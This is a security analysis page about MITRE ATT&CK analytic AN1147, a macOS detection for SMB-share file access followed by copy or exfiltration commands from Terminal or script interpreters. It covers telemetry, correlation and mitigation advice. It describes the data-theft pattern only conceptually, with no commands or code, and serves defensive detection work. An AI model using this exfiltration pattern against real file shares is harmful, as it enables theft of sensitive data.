AN1147: Analytic 1147
Detection of file access from mounted SMB shares followed by copy or exfil commands from Terminal or script interpreter processes.
Analyst context for executives and security teams
AN1147 is a macOS detection analytic focused on a practical data-loss pattern: files accessed from mounted SMB shares and then copied or potentially exfiltrated through Terminal or script interpreter processes. For leaders, the value is not the analytic name; it is whether the organization can see when shared file repositories are being accessed from Macs and quickly moved using command-line tooling.
Executive priority
Prioritize this where macOS endpoints have access to SMB file shares containing sensitive business, customer, regulated, or operational data. The decision point is whether security teams can produce evidence of endpoint activity, share access, and command-line file movement during an incident or audit. This analytic supports resilience and compliance readiness by testing visibility over a common path from internal file access to unauthorized transfer, but the ATT&CK object does not provide tactics, relationships, or confirmed threat context.
Technical view
Validate coverage on macOS for sequences involving mounted SMB share file access followed by copy or exfiltration-like commands launched from Terminal or script interpreter processes. Because the official detection logic is not provided, SOC and detection engineering teams should define local correlation rules based on observed file paths, mounted share indicators, parent processes, command-line arguments, and timing. Tune carefully for legitimate administrative, backup, developer, and user file-transfer workflows.
Likely telemetry
- macOS endpoint process execution telemetry
- Command-line arguments from Terminal and script interpreter processes
- File access events involving mounted SMB shares
- File copy or transfer command activity
- Mount information or filesystem path evidence showing SMB share usage
Detection direction
- Confirm that macOS EDR or endpoint logging captures Terminal and script interpreter process starts with command-line detail.
- Validate visibility into file access on mounted SMB shares, not only local disk activity.
- Correlate SMB share access with subsequent copy or transfer commands within a defensible time window.
- Baseline legitimate business workflows that copy files from SMB shares to reduce false positives.
- Review blind spots where command-line arguments, mounted volume paths, or file access auditing are unavailable or inconsistently collected.
Mitigation priorities
- Classify and restrict SMB share access based on business need and data sensitivity.
- Apply least-privilege access to shared repositories used by macOS endpoints.
- Ensure endpoint monitoring and logging are enabled for macOS process and file activity relevant to mounted shares.
- Use incident response playbooks that preserve endpoint, user, command-line, and share-access evidence.
- Periodically test whether SOC teams can detect and investigate suspicious file movement from SMB shares on macOS.
Analyst notes and limits
This take is based only on the supplied ATT&CK analytic fields. AN1147 is a detection analytic for macOS; no ATT&CK tactics, relationships, aliases, or detailed official detection logic were supplied. Local implementation requires environment-specific knowledge of SMB share paths, approved transfer tools, endpoint logging depth, and normal user behavior.
The source does not provide rule logic, data source mappings, related techniques, adversary usage, or mitigation text. It should be treated as a validation prompt for macOS SMB-share file-movement visibility, not as proof of existing detection coverage or active exploitation.
Analytic 1147
Detection of file access from mounted SMB shares followed by copy or exfil commands from Terminal or script interpreter processes.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 6f00dbc3352a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN1147Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.